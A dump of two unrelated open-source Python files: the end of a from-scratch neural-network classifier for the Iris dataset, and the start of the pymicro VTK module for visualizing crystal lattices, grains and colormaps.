def mat_vec(A, B): # Matrix (A) x vector (B) multipilicatoin (for backprop)
C = [0 for i in range(len(A))]
for i in range(len(A)):
for j in range(len(B)):
C[i] += A[i][j] * B[j]
return C
def sigmoid(A, deriv=False):
if deriv: # derivation of sigmoid (for backprop)
for i in range(len(A)):
A[i] = A[i] * (1 - A[i])
else:
for i in range(len(A)):
A[i] = 1 / (1 + math.exp(-A[i]))
return A
# Define parameter
alfa = 0.005
epoch = 400
neuron = [4, 4, 3] # number of neuron each layer
# Initiate weight and bias with 0 value
weight = [[0 for j in range(neuron[1])] for i in range(neuron[0])]
weight_2 = [[0 for j in range(neuron[2])] for i in range(neuron[1])]
bias = [0 for i in range(neuron[1])]
bias_2 = [0 for i in range(neuron[2])]
# Initiate weight with random between -1.0 ... 1.0
for i in range(neuron[0]):
for j in range(neuron[1]):
weight[i][j] = 2 * random.random() - 1
for i in range(neuron[1]):
for j in range(neuron[2]):
weight_2[i][j] = 2 * random.random() - 1
for e in range(epoch):
cost_total = 0
for idx, x in enumerate(train_X): # Update for each data; SGD
# Forward propagation
h_1 = vec_mat_bias(x, weight, bias)
X_1 = sigmoid(h_1)
h_2 = vec_mat_bias(X_1, weight_2, bias_2)
X_2 = sigmoid(h_2)
# Convert to One-hot target
target = [0, 0, 0]
target[int(train_y[idx])] = 1
# Cost function, Square Root Eror
eror = 0
for i in range(neuron[2]):
eror += (target[i] - X_2[i]) ** 2
cost_total += eror * 1 / neuron[2]
# Backward propagation
# Update weight_2 and bias_2 (layer 2)
delta_2 = []
for j in range(neuron[2]):
delta_2.append(-1 * 2. / neuron[2] * (target[j]-X_2[j]) * X_2[j] * (1-X_2[j]))
for i in range(neuron[1]):
for j in range(neuron[2]):
weight_2[i][j] -= alfa * (delta_2[j] * X_1[i])
bias_2[j] -= alfa * delta_2[j]
# Update weight and bias (layer 1)
delta_1 = mat_vec(weight_2, delta_2)
for j in range(neuron[1]):
delta_1[j] = delta_1[j] * (X_1[j] * (1-X_1[j]))
for i in range(neuron[0]):
for j in range(neuron[1]):
weight[i][j] -= alfa * (delta_1[j] * x[i])
bias[j] -= alfa * delta_1[j]
cost_total /= len(train_X)
if(e % 100 == 0):
print(cost_total)
"""
SECTION 3 : Testing
"""
res = matrix_mul_bias(test_X, weight, bias)
res_2 = matrix_mul_bias(res, weight_2, bias)
# Get prediction
preds = []
for r in res_2:
preds.append(max(enumerate(r), key=lambda x:x[1])[0])
# Print prediction
print(preds)
# Calculate accuration
acc = 0.0
for i in range(len(preds)):
if preds[i] == int(test_y[i]):
acc += 1
print(acc / len(preds) * 100, "%")
|
rianrajagede/simplesamplecode
|
Python/iris_plain_mlp.py
|
Python
|
mit
| 4,759
|
[
"NEURON"
] |
63e229d48bf44e3113f2b8574e03f9f12833ae25c896669a443ea0bf9185820a
|
import os
import sys
import vtk
import numpy as np
from vtk.util.colors import red, green, black, white, grey, blue, orange, peacock
from vtk.util import numpy_support
# see if some of the stuff needs to be moved to the Microstructure module
from pymicro.crystal.lattice import Lattice, HklPlane
def to_vtk_type(type):
'''Function to get the VTK data type given a numpy data type.
:param str type: The numpy data type like 'uint8', 'uint16'...
:return: A VTK data type.
'''
if type == 'uint8':
return vtk.VTK_UNSIGNED_CHAR
elif type == 'uint16':
return vtk.VTK_UNSIGNED_SHORT
elif type == 'uint32':
return vtk.VTK_UNSIGNED_INT
elif type == 'float':
return vtk.VTK_FLOAT
elif type == 'float64':
return vtk.VTK_DOUBLE
def rand_cmap(N=256, first_is_black=False, table_range=(0, 255)):
'''Create a VTK lookup table with random colors.
The first color can be enforced to black and usually figure out
the image background. The random seed is fixed to 13 in order
to consistently produce the same colormap.
:param int N: The number of colors in the colormap.
:param bool first_is_black: Force the first color to be black.
:param typle table_range: The range of the VTK lookup table
:return: A vtkLookupTable lookup table with N random colors.
'''
np.random.seed(13)
rand_colors = np.random.rand(N, 3)
if first_is_black:
rand_colors[0] = [0., 0., 0.] # enforce black background
lut = vtk.vtkLookupTable()
lut.SetNumberOfTableValues(N)
lut.Build()
for i in range(N):
lut.SetTableValue(i, rand_colors[i][0], rand_colors[i][1], rand_colors[i][2], 1.0)
lut.SetRange(table_range)
return lut
def pv_rand_cmap(N=256, first_is_black=False):
'''Write out the random color map in paraview xml format.
This method print out the XML declaration of the random colormap.
This may be saved to a text file and used in paraview.
:param int N: The number of colors in the colormap.
:param bool first_is_black: Force the first color to be black.
'''
np.random.seed(13)
rand_colors = np.random.rand(N, 3)
if first_is_black:
rand_colors[0] = [0., 0., 0.] # enforce black background
print('<ColorMap name="random" space="RGB">')
for i in range(N):
print('<Point x="%d" o="1" r="%8.6f" g="%8.6f" b="%8.6f"/>' %
(i, rand_colors[i][0], rand_colors[i][1], rand_colors[i][2]))
print('</ColorMap>')
def pyplot_cmap(name='viridis', table_range=(0, 255)):
"""Create a VTK colormap from pyplot.
:param str name: the color map name to import from pyplot.
:return:
"""
from matplotlib import cm
cmap = cm.get_cmap(name)
lut = vtk.vtkLookupTable()
lut.SetNumberOfTableValues(256)
lut.Build()
for i in range(256):
lut.SetTableValue(i, *cmap([i]))
lut.SetRange(table_range)
return lut
def gray_cmap(table_range=(0, 255)):
'''create a black and white colormap.
*Parameters*
**table_range**: 2 values tuple (default: (0,255))
start and end values for the table range.
*Returns*
A vtkLookupTable from black to white.
'''
lut = vtk.vtkLookupTable()
lut.SetSaturationRange(0, 0)
lut.SetHueRange(0, 0)
lut.SetTableRange(table_range)
lut.SetValueRange(0, 1)
lut.SetRampToLinear()
lut.Build()
return lut
def invert_cmap(ref_lut):
'''invert a VTK lookup table.
*Parameters*
**ref_lut**: The lookup table to invert.
*Returns*
A reverse vtkLookupTable.
'''
N = ref_lut.GetNumberOfTableValues()
lut = vtk.vtkLookupTable()
lut.SetNumberOfTableValues(N)
lut.Build()
for i in range(N):
lut.SetTableValue(i, ref_lut.GetTableValue(N - i))
lut.SetRange(ref_lut.GetTableRange())
return lut
def hsv_cmap(N=64, table_range=(0, 255)):
'''Create a VTK look up table similar to matlab's hsv.
*Parameters*
**N**: int, number of colors in the table.
**table_range**: 2 values tuple (default: (0,255))
start and end values for the table range.
*Returns*
A vtkLookupTable.
'''
lut = vtk.vtkLookupTable()
lut.SetHueRange(0.0, 1.0)
lut.SetSaturationRange(1.0, 1.0)
lut.SetValueRange(1.0, 1.0)
lut.SetNumberOfColors(N)
lut.Build()
lut.SetRange(table_range)
return lut
def jet_cmap(N=64, table_range=(0, 255)):
'''Create a VTK look up table similar to matlab's jet.
*Parameters*
**N**: int, number of colors in the table.
**table_range**: 2 values tuple (default: (0,255))
start and end values for the table range.
*Returns*
A vtkLookupTable from blue to red.
'''
lut = vtk.vtkLookupTable()
lut.SetHueRange(0.667, 0.0)
lut.SetNumberOfColors(N)
lut.Build()
lut.SetRange(table_range)
return lut
def hot_cmap(table_range=(0, 255)):
'''Create a VTK look up table similar to matlab's hot.
*Parameters*
**table_range**: 2 values tuple (default: (0,255))
start and end values for the table range.
*Returns*
A vtkLookupTable from white to red.
'''
lut = vtk.vtkLookupTable()
lutNum = 64
lut.SetNumberOfTableValues(lutNum)
lut.Build()
lut.SetTableValue(0, 0.041667, 0.000000, 0.000000, 1.0)
lut.SetTableValue(1, 0.083333, 0.000000, 0.000000, 1.0)
lut.SetTableValue(2, 0.125000, 0.000000, 0.000000, 1.0)
lut.SetTableValue(3, 0.166667, 0.000000, 0.000000, 1.0)
lut.SetTableValue(4, 0.208333, 0.000000, 0.000000, 1.0)
lut.SetTableValue(5, 0.250000, 0.000000, 0.000000, 1.0)
lut.SetTableValue(6, 0.291667, 0.000000, 0.000000, 1.0)
lut.SetTableValue(7, 0.333333, 0.000000, 0.000000, 1.0)
lut.SetTableValue(8, 0.375000, 0.000000, 0.000000, 1.0)
lut.SetTableValue(9, 0.416667, 0.000000, 0.000000, 1.0)
lut.SetTableValue(10, 0.458333, 0.000000, 0.000000, 1.0)
lut.SetTableValue(11, 0.500000, 0.000000, 0.000000, 1.0)
lut.SetTableValue(12, 0.541667, 0.000000, 0.000000, 1.0)
lut.SetTableValue(13, 0.583333, 0.000000, 0.000000, 1.0)
lut.SetTableValue(14, 0.625000, 0.000000, 0.000000, 1.0)
lut.SetTableValue(15, 0.666667, 0.000000, 0.000000, 1.0)
lut.SetTableValue(16, 0.708333, 0.000000, 0.000000, 1.0)
lut.SetTableValue(17, 0.750000, 0.000000, 0.000000, 1.0)
lut.SetTableValue(18, 0.791667, 0.000000, 0.000000, 1.0)
lut.SetTableValue(19, 0.833333, 0.000000, 0.000000, 1.0)
lut.SetTableValue(20, 0.875000, 0.000000, 0.000000, 1.0)
lut.SetTableValue(21, 0.916667, 0.000000, 0.000000, 1.0)
lut.SetTableValue(22, 0.958333, 0.000000, 0.000000, 1.0)
lut.SetTableValue(23, 1.000000, 0.000000, 0.000000, 1.0)
lut.SetTableValue(24, 1.000000, 0.041667, 0.000000, 1.0)
lut.SetTableValue(25, 1.000000, 0.083333, 0.000000, 1.0)
lut.SetTableValue(26, 1.000000, 0.125000, 0.000000, 1.0)
lut.SetTableValue(27, 1.000000, 0.166667, 0.000000, 1.0)
lut.SetTableValue(28, 1.000000, 0.208333, 0.000000, 1.0)
lut.SetTableValue(29, 1.000000, 0.250000, 0.000000, 1.0)
lut.SetTableValue(30, 1.000000, 0.291667, 0.000000, 1.0)
lut.SetTableValue(31, 1.000000, 0.333333, 0.000000, 1.0)
lut.SetTableValue(32, 1.000000, 0.375000, 0.000000, 1.0)
lut.SetTableValue(33, 1.000000, 0.416667, 0.000000, 1.0)
lut.SetTableValue(34, 1.000000, 0.458333, 0.000000, 1.0)
lut.SetTableValue(35, 1.000000, 0.500000, 0.000000, 1.0)
lut.SetTableValue(36, 1.000000, 0.541667, 0.000000, 1.0)
lut.SetTableValue(37, 1.000000, 0.583333, 0.000000, 1.0)
lut.SetTableValue(38, 1.000000, 0.625000, 0.000000, 1.0)
lut.SetTableValue(39, 1.000000, 0.666667, 0.000000, 1.0)
lut.SetTableValue(40, 1.000000, 0.708333, 0.000000, 1.0)
lut.SetTableValue(41, 1.000000, 0.750000, 0.000000, 1.0)
lut.SetTableValue(42, 1.000000, 0.791667, 0.000000, 1.0)
lut.SetTableValue(43, 1.000000, 0.833333, 0.000000, 1.0)
lut.SetTableValue(44, 1.000000, 0.875000, 0.000000, 1.0)
lut.SetTableValue(45, 1.000000, 0.916667, 0.000000, 1.0)
lut.SetTableValue(46, 1.000000, 0.958333, 0.000000, 1.0)
lut.SetTableValue(47, 1.000000, 1.000000, 0.000000, 1.0)
lut.SetTableValue(48, 1.000000, 1.000000, 0.062500, 1.0)
lut.SetTableValue(49, 1.000000, 1.000000, 0.125000, 1.0)
lut.SetTableValue(50, 1.000000, 1.000000, 0.187500, 1.0)
lut.SetTableValue(51, 1.000000, 1.000000, 0.250000, 1.0)
lut.SetTableValue(52, 1.000000, 1.000000, 0.312500, 1.0)
lut.SetTableValue(53, 1.000000, 1.000000, 0.375000, 1.0)
lut.SetTableValue(54, 1.000000, 1.000000, 0.437500, 1.0)
lut.SetTableValue(55, 1.000000, 1.000000, 0.500000, 1.0)
lut.SetTableValue(56, 1.000000, 1.000000, 0.562500, 1.0)
lut.SetTableValue(57, 1.000000, 1.000000, 0.625000, 1.0)
lut.SetTableValue(58, 1.000000, 1.000000, 0.687500, 1.0)
lut.SetTableValue(59, 1.000000, 1.000000, 0.750000, 1.0)
lut.SetTableValue(60, 1.000000, 1.000000, 0.812500, 1.0)
lut.SetTableValue(61, 1.000000, 1.000000, 0.875000, 1.0)
lut.SetTableValue(62, 1.000000, 1.000000, 0.937500, 1.0)
lut.SetTableValue(63, 1.000000, 1.000000, 1.000000, 1.0)
lut.SetRange(table_range)
return lut
def add_hklplane_to_grain(hkl_plane, grid, orientation, origin=(0, 0, 0), opacity=1.0,
show_normal=False, normal_length=1.0, show_intersection=False, color_intersection=red):
"""Add a plane describing a crystal lattice plane to a VTK grid.
:param hkl_plane: an instance of `HklPlane` describing the lattice plane.
:param grid: a vtkunstructuredgrid instance representing the geometry of the grain.
:param orientation: the grain orientation.
:param origin: the origin of the plane in the grain.
:param float opacity:
:param show_normal: A flag to show the plane normal.
:param normal_length: The length of the plane normal.
:param show_intersection: A flag to show the intersection of the plane with the grain.
:param tuple color_intersection: The color to display the intersection of the plane with the grain.
:return: A VTK assembly with the grain, the plane, its normal and edge intersection if requested.
"""
# compute the plane normal in the laboratory frame using the grain orientation
gt = orientation.orientation_matrix().transpose()
n_rot = np.dot(gt, hkl_plane.normal() / np.linalg.norm(hkl_plane.normal()))
rot_plane = vtk.vtkPlane()
rot_plane.SetOrigin(origin)
# rotate the plane by setting the normal
rot_plane.SetNormal(n_rot)
return add_plane_to_grid(rot_plane, grid, opacity=opacity, show_normal=show_normal, normal_length=normal_length,
show_intersection=show_intersection, color_intersection=color_intersection)
def add_slip_system_to_grain(slip_system, grid, orientation, origin=(0, 0, 0), opacity=1.0,
show_normal=False, normal_length=1.0, show_intersection=False, color_intersection=red):
"""Add a slip system to a VTK grid.
:param slip_system: an instance of `SlipSystem` describing the slip system.
:param grid: a vtkunstructuredgrid instance representing the geometry of the grain.
:param orientation: the grain orientation.
:param origin: the origin of the plane in the grain.
:param float opacity: opacity value of the plane.
:param show_normal: A flag to show the plane normal.
:param normal_length: The length of the plane normal.
:param show_intersection: A flag to show the intersection of the plane with the grain.
:param tuple color_intersection: The color to display the intersection of the plane with the grain.
:return: A VTK assembly with the grain, the plane, its normal and edge intersection if requested and the slip
direction.
"""
# compute the plane normal in the laboratory frame using the grain orientation
gt = orientation.orientation_matrix().transpose()
slip_plane = slip_system.get_slip_plane()
slip_dir = slip_system.get_slip_direction()
n_rot = np.dot(gt, slip_plane.normal() / np.linalg.norm(slip_plane.normal()))
l_rot = np.dot(gt, slip_dir.direction() / np.linalg.norm(slip_dir.direction()))
rot_plane = vtk.vtkPlane()
rot_plane.SetOrigin(origin)
# rotate the plane by setting the normal
rot_plane.SetNormal(n_rot)
assembly = add_plane_to_grid(rot_plane, grid, opacity=opacity,
show_normal=show_normal, normal_length=normal_length,
show_intersection=show_intersection,
color_intersection=color_intersection)
slip_dir_actor = unit_arrow_3d(origin, normal_length * l_rot,
make_unit=False, color=peacock)
assembly.AddPart(slip_dir_actor)
return assembly
def add_plane_to_grid(plane, grid, origin=None, color=None, opacity=0.3, show_normal=False, normal_length=1.0,
show_intersection=False, color_intersection=red):
"""Add a 3d plane inside another object.
This function adds a plane inside another object described by a mesh (vtkunstructuredgrid).
The method is to use a vtkCutter with the mesh as input and the plane as the cut function.
The plane normal can be displayed and its length controlled.
This may be used directly to add hkl planes inside a lattice cell or
a grain.
:param plane: A VTK implicit function describing the plane to add.
:param grid: A VTK unstructured grid in which the plane is to be added.
:param tuple origin: (x, y, z) tuple to define the origin of the plane.
:param tuple color: A color defined by its rgb components.
:param float opacity: Opacity value of the plane actor.
:param bool show_normal: A flag to display the plane normal.
:param normal_length: The length of the plane normal vector (1.0 by default).
:param bool show_intersection: Also add the intersection of the plane with the grid in the assembly.
:param tuple color_intersection: The color to display the intersection of the plane with the grid.
:returns: A VTK assembly with the mesh, the plane, its normal and edge intersection if requested.
"""
# prepare an assembly for the result
assembly = vtk.vtkAssembly()
# cut the unstructured grid with the plane
planeCut = vtk.vtkCutter()
if vtk.vtkVersion().GetVTKMajorVersion() > 5:
planeCut.SetInputData(grid)
else:
planeCut.SetInput(grid)
planeCut.SetCutFunction(plane)
cutMapper = vtk.vtkPolyDataMapper()
cutMapper.SetInputConnection(planeCut.GetOutputPort())
cutActor = vtk.vtkActor()
cutActor.SetMapper(cutMapper)
if color:
cutActor.GetProperty().SetColor(color)
cutActor.GetProperty().SetOpacity(opacity)
assembly.AddPart(cutActor)
if show_normal:
# add an arrow to display the normal to the plane
if origin is None:
origin = plane.GetOrigin()
arrowActor = unit_arrow_3d(origin, normal_length * np.array(plane.GetNormal()), make_unit=False)
assembly.AddPart(arrowActor)
if show_intersection:
extract = vtk.vtkFeatureEdges()
extract.SetInputConnection(planeCut.GetOutputPort())
edge_mapper = vtk.vtkPolyDataMapper()
edge_mapper.SetInputConnection(extract.GetOutputPort())
edge_mapper.SetScalarVisibility(0)
edge_actor = vtk.vtkActor()
edge_actor.SetMapper(edge_mapper)
edge_actor.GetProperty().SetColor(color_intersection)
edge_actor.GetProperty().SetLineWidth(3.0)
assembly.AddPart(edge_actor)
return assembly
def axes_actor(length=1.0, axisLabels=('x', 'y', 'z'), fontSize=20, color=None):
'''Build an actor for the cartesian axes.
:param length: The arrow length of the axes (1.0 by default).
:type length: float or triple of float to specify the length of each axis individually.
:param list axisLabels: Specify the axes labels (xyz by default), use axisLabels = None to hide the axis labels
:param int fontSize: Font size for the axes labels (20 by default).
:param tuple color: A single color defined by its rgb components (not set by default which keep the red, green, blue colors).
:returns: A VTK assembly representing the cartesian axes.
'''
axes = vtk.vtkAxesActor()
if isinstance(length, (float, int, np.int64, np.float64)):
axes.SetTotalLength(length, length, length)
else:
assert(len(length) == 3)
axes.SetTotalLength(length)
axes.SetShaftTypeToCylinder()
axes.SetCylinderRadius(0.02)
if axisLabels:
axes.GetXAxisCaptionActor2D().GetTextActor().SetTextScaleModeToNone()
axes.GetYAxisCaptionActor2D().GetTextActor().SetTextScaleModeToNone()
axes.GetZAxisCaptionActor2D().GetTextActor().SetTextScaleModeToNone()
axprop = vtk.vtkTextProperty()
axprop.SetColor(0, 0, 0)
axprop.SetFontSize(fontSize)
axprop.SetFontFamilyToArial()
axes.GetXAxisCaptionActor2D().SetCaptionTextProperty(axprop)
axes.GetYAxisCaptionActor2D().SetCaptionTextProperty(axprop)
axes.GetZAxisCaptionActor2D().SetCaptionTextProperty(axprop)
axes.SetXAxisLabelText(axisLabels[0])
axes.SetYAxisLabelText(axisLabels[1])
axes.SetZAxisLabelText(axisLabels[2])
else:
axes.SetAxisLabels(0)
if color:
# set the color of the whole triad
collection = vtk.vtkPropCollection()
axes.GetActors(collection)
for i in range(collection.GetNumberOfItems()):
collection.GetItemAsObject(i).GetProperty().SetColor(color)
return axes
def grain_3d(grain, hklplanes=None, show_normal=False, plane_origins=None,
plane_opacity=1.0, show_orientation=False, N=2048, verbose=False):
"""Creates a 3d representation of a crystallographic grain.
This method creates a vtkActor object of the surface mesh
representing a Grain object. An optional list of crystallographic
planes can be given
:param grain: the Grain object to be shown in 3d.
:param list hklplanes: the list of HklPlanes object to add to the assembly.
:param bool show_normal: show also the normal to the hkl planes if True.
:param list plane_origins: the list of each plane origin (3d scene coordinates).
:param float plane_opacity: set the opacity of the grain actor.
:param bool show_orientation: show also the grain orientation with a vtkAxesActor placed at the grain center if True.
:param int N: the number of colors to use in the colormap.
:param bool verbose: activate verbose mode.
:returns: a vtkAssembly of the grain mesh and the optional hkl planes.
"""
assembly = vtk.vtkAssembly()
# create mapper
mapper = vtk.vtkDataSetMapper()
if vtk.vtkVersion().GetVTKMajorVersion() > 5:
mapper.SetInputData(grain.vtkmesh)
else:
mapper.SetInput(grain.vtkmesh)
mapper.ScalarVisibilityOff() # we use the grain id for chosing the color
lut = rand_cmap(N, first_is_black=True, table_range=(0, N - 1))
grain_actor = vtk.vtkActor()
if verbose:
print(grain.id)
print(lut.GetTableValue(grain.id)[0:3])
grain_actor.GetProperty().SetColor(lut.GetTableValue(grain.id)[0:3])
grain_actor.GetProperty().SetOpacity(0.3)
grain_actor.SetMapper(mapper)
assembly.AddPart(grain_actor)
if show_orientation:
local_orientation = add_local_orientation_axes(grain.orientation, axes_length=30)
# add local orientation to the grain actor
assembly.AddPart(local_orientation)
# add all hkl planes
if hklplanes:
from itertools import cycle
# colors for the intersection
it = cycle([red, green, blue, orange])
# look at each hkl plane in the list
for i, hklplane in enumerate(hklplanes):
# the grain has its center of mass at the origin
origin = [(0., 0., 0.)]
color = next(it)
if plane_origins is not None:
origin = plane_origins[i] # in unit of the 3d scene
if verbose:
print('using origin %s' % str(origin))
if type(origin) is not list:
origin = [plane_origins[i]]
# we will add a series of this plane (one per origin value)
for o in origin:
hklplaneActor = add_hklplane_to_grain(hklplane, grain.vtkmesh,
grain.orientation, origin=o, opacity=plane_opacity,
show_normal=show_normal, normal_length=50.,
show_intersection=True, color_intersection=color)
assembly.AddPart(hklplaneActor)
color = next(it)
return assembly
# deprecated, will be removed soon
def add_grain_to_3d_scene(grain, hklplanes, show_orientation=False):
assembly = vtk.vtkAssembly()
# create mapper
print('creating grain actor')
mapper = vtk.vtkDataSetMapper()
if vtk.vtkVersion().GetVTKMajorVersion() > 5:
mapper.SetInputData(grain.vtkmesh)
else:
mapper.SetInput(grain.vtkmesh)
mapper.ScalarVisibilityOff() # we use the grain id for choosing the color
lut = rand_cmap(N=2048, first_is_black=True, table_range=(0, 2047))
grain_actor = vtk.vtkActor()
grain_actor.GetProperty().SetColor(lut.GetTableValue(grain.id)[0:3])
grain_actor.SetMapper(mapper)
assembly.AddPart(grain_actor)
# add all hkl planes and local grain orientation actor
if show_orientation:
grain_actor.GetProperty().SetOpacity(0.3)
local_orientation = add_HklPlanes_with_orientation_in_grain(grain, hklplanes)
# add local orientation to the grain actor
assembly.AddPart(local_orientation)
return assembly
def add_local_orientation_axes(orientation, axes_length=30):
# use a vtkAxesActor to display the crystal orientation
local_orientation = vtk.vtkAssembly()
axes = axes_actor(length=axes_length, axisLabels=False)
apply_orientation_to_actor(axes, orientation)
'''
transform = vtk.vtkTransform()
transform.Identity()
transform.RotateZ(orientation.phi1())
transform.RotateX(orientation.Phi())
transform.RotateZ(orientation.phi2())
axes.SetUserTransform(transform)
'''
local_orientation.AddPart(axes)
return local_orientation
def add_HklPlanes_with_orientation_in_grain(grain, \
hklplanes=[]):
'''
Add some plane actors corresponding to a list of (hkl) planes to
a grain actor.
'''
# use a vtkAxesActor to display the crystal orientation
local_orientation = vtk.vtkAssembly()
grain_axes = axes_actor(length=30, axisLabels=False)
apply_orientation_to_actor(grain_axes, grain.orientation)
local_orientation.AddPart(grain_axes)
# add all hkl planes to the grain
for hklplane in hklplanes:
hklplaneActor = add_hklplane_to_grain(hklplane, grain.vtkmesh, \
grain.orientation)
local_orientation.AddPart(hklplaneActor)
return local_orientation
def unit_arrow_3d(start, vector, color=orange, radius=0.03, make_unit=True, label=False, text=None, text_scale=0.1,
vector_normal=None):
n = np.linalg.norm(vector)
arrowSource = vtk.vtkArrowSource()
arrowSource.SetShaftRadius(radius)
arrowSource.SetTipRadius(10 * radius / 3.)
# We build a local direct base with X being the unit arrow vector
X = vector / n
arb = np.array([1, 0, 0])
if abs(np.dot(X, arb)) == 1: # avoid using 2 colinear vectors
arb = np.array([0, 1, 0])
Z = np.cross(X, arb)
Y = np.cross(Z, X)
m = vtk.vtkMatrix4x4()
m.Identity()
m.DeepCopy((1, 0, 0, start[0],
0, 1, 0, start[1],
0, 0, 1, start[2],
0, 0, 0, 1))
# Create the direction cosine matrix
if make_unit:
n = 1
for i in range(3):
m.SetElement(i, 0, n * X[i])
m.SetElement(i, 1, n * Y[i])
m.SetElement(i, 2, n * Z[i])
t = vtk.vtkTransform()
t.Identity()
t.Concatenate(m)
transArrow = vtk.vtkTransformFilter()
transArrow.SetInputConnection(arrowSource.GetOutputPort())
transArrow.SetTransform(t)
mapper = vtk.vtkPolyDataMapper()
mapper.SetInputConnection(transArrow.GetOutputPort())
arrowActor = vtk.vtkActor()
arrowActor.SetMapper(mapper)
arrowActor.GetProperty().SetColor(color)
if label:
# add a text actor to display the vector coordinates
assembly = vtk.vtkAssembly()
assembly.AddPart(arrowActor)
vectorText = vtk.vtkVectorText()
if text == None:
# display the vector coordinates as text
vectorText.SetText(np.array_str(vector))
else:
vectorText.SetText(text)
textMapper = vtk.vtkPolyDataMapper()
textMapper.SetInputConnection(vectorText.GetOutputPort())
textTransform = vtk.vtkTransform()
start_text = start + vector
mt = vtk.vtkMatrix4x4()
mt.Identity()
mt.DeepCopy((1, 0, 0, start_text[0],
0, 1, 0, start_text[1],
0, 0, 1, start_text[2],
0, 0, 0, 1))
# Create the direction cosine matrix
if vector_normal == None: vector_normal = Z
for i in range(3):
mt.SetElement(i, 0, vector[i]);
mt.SetElement(i, 1, Y[i]);
mt.SetElement(i, 2, vector_normal[i]);
textTransform.Identity()
textTransform.Concatenate(mt)
textTransform.Scale(text_scale, text_scale, text_scale)
textActor = vtk.vtkActor()
textActor.SetMapper(textMapper)
textActor.SetUserTransform(textTransform)
textActor.GetProperty().SetColor(color)
assembly.AddPart(textActor)
return assembly
else:
return arrowActor
def lattice_points(lattice, origin=(0., 0., 0.), m=1, n=1, p=1):
'''
Create a vtk representation of a the lattice points.
A vtkPoints instance is used to store the lattice points, including
the points not on the lattice corners according to the system
centering (may be P, I, F for instance).
:param Lattice lattice: The Lattice instance from which to construct the points.
:param tuple origin: cartesian coordinates of the origin.
:param int m: the number of cells in the [100] direction (1 by default).
:param int n: the number of cells in the [010] direction (1 by default).
:param int p: the number of cells in the [001] direction (1 by default).
:return: A vtkPoints with all the lattice points ordered such that the first 8*(m*n*p) points describe the lattice cells.
'''
[A, B, C] = lattice._matrix
O = origin
points = vtk.vtkPoints()
# create all the points based on the lattice matrix
for k in range(p + 1):
for j in range(n + 1):
for i in range(m + 1):
points.InsertNextPoint(O + i * A + j * B + k * C)
# now add extra points to represent the lattice centering
for k in range(p):
for j in range(n):
for i in range(m):
O = origin + i * A + j * B + k * C
if lattice._centering == 'P':
pass # nothing to do
elif lattice._centering == 'I':
points.InsertNextPoint(O + 0.5 * A + 0.5 * B + 0.5 * C)
elif lattice._centering == 'A':
points.InsertNextPoint(O + 0.5 * B + 0.5 * C)
points.InsertNextPoint(O + A + 0.5 * B + 0.5 * C)
elif lattice._centering == 'B':
points.InsertNextPoint(O + 0.5 * A + 0.5 * C)
points.InsertNextPoint(O + 0.5 * A + B + 0.5 * C)
elif lattice._centering == 'C':
points.InsertNextPoint(O + 0.5 * A + 0.5 * B)
points.InsertNextPoint(O + 0.5 * A + 0.5 * B + C)
elif lattice._centering == 'F':
points.InsertNextPoint(O + 0.5 * A + 0.5 * B)
points.InsertNextPoint(O + 0.5 * A + 0.5 * B + C)
points.InsertNextPoint(O + 0.5 * B + 0.5 * C)
points.InsertNextPoint(O + 0.5 * B + 0.5 * C + A)
points.InsertNextPoint(O + 0.5 * C + 0.5 * A)
points.InsertNextPoint(O + 0.5 * C + 0.5 * A + B)
return points
def lattice_grid(lattice, origin=(0., 0., 0.), m=1, n=1, p=1):
"""
Create a mesh representation of a crystal lattice.
A vtkUnstructuredGrid instance is used with a hexaedron element
corresponding to the lattice system. Any number of cells can be
displayed (just one by default).
:param Lattice lattice: The Lattice instance from which to construct the grid.
:param tuple origin: cartesian coordinates of the origin.
:param int m: the number of cells in the [100] direction (1 by default).
:param int n: the number of cells in the [010] direction (1 by default).
:param int p: the number of cells in the [001] direction (1 by default).
:return: A vtkUnstructuredGrid with (m x n x p) hexaedron cell representing the crystal lattice.
"""
points = lattice_points(lattice, origin, m, n, p)
# build the unstructured grid with m x n x p cells
grid = vtk.vtkUnstructuredGrid()
grid.SetPoints(points)
grid.Allocate(p * n * m, 1)
for k in range(p):
for j in range(n):
for i in range(m):
# ids list
Ids = vtk.vtkIdList()
Ids.InsertNextId(i + j * (m + 1) + k * (m + 1) * (n + 1))
Ids.InsertNextId(i + 1 + j * (m + 1) + k * (m + 1) * (n + 1))
Ids.InsertNextId(i + 1 + (j + 1) * (m + 1) + k * (m + 1) * (n + 1))
Ids.InsertNextId(i + (j + 1) * (m + 1) + k * (m + 1) * (n + 1))
Ids.InsertNextId(i + j * (m + 1) + (k + 1) * (m + 1) * (n + 1))
Ids.InsertNextId(i + 1 + j * (m + 1) + (k + 1) * (m + 1) * (n + 1))
Ids.InsertNextId(i + 1 + (j + 1) * (m + 1) + (k + 1) * (m + 1) * (n + 1))
Ids.InsertNextId(i + (j + 1) * (m + 1) + (k + 1) * (m + 1) * (n + 1))
grid.InsertNextCell(vtk.VTK_HEXAHEDRON, Ids)
return grid
def hexagonal_lattice_grid(lattice, origin=[0., 0., 0.]):
"""
Create a mesh representation of a hexagonal crystal lattice.
A vtkUnstructuredGrid instance is used with a hexagonal prism element
corresponding to 3 unit cells of the lattice system.
:param Lattice lattice: The Lattice instance from which to construct the grid.
:param tuple origin: cartesian coordinates of the origin.
:return: A vtkUnstructuredGrid one hexagnal prism cell representing the crystal lattice.
"""
[A, B, C] = lattice._matrix
O = origin
points = vtk.vtkPoints()
points.InsertNextPoint(O)
points.InsertNextPoint(O + A)
points.InsertNextPoint(O + A - B)
points.InsertNextPoint(O - 2 * B)
points.InsertNextPoint(O - 2 * B - A)
points.InsertNextPoint(O - B - A)
points.InsertNextPoint(O + C)
points.InsertNextPoint(O + A + C)
points.InsertNextPoint(O + A - B + C)
points.InsertNextPoint(O - 2 * B + C)
points.InsertNextPoint(O - 2 * B - A + C)
points.InsertNextPoint(O - B - A + C)
ids = vtk.vtkIdList()
ids.InsertNextId(0)
ids.InsertNextId(1)
ids.InsertNextId(2)
ids.InsertNextId(3)
ids.InsertNextId(4)
ids.InsertNextId(5)
ids.InsertNextId(6)
ids.InsertNextId(7)
ids.InsertNextId(8)
ids.InsertNextId(9)
ids.InsertNextId(10)
ids.InsertNextId(11)
# build the unstructured grid with one cell
grid = vtk.vtkUnstructuredGrid()
grid.Allocate(1, 1)
grid.InsertNextCell(16, ids) # 16 is hexagonal prism cell type
grid.SetPoints(points)
return grid
def lattice_edges(grid, tubeRadius=0.02, tubeColor=grey):
'''
Create the 3D representation of crystal lattice edges.
*Parameters*
**grid**: vtkUnstructuredGrid
The vtkUnstructuredGrid instance representing the crystal lattice.
**tubeRadius**: float
Radius of the tubes representing the atomic bonds (default: 0.02).
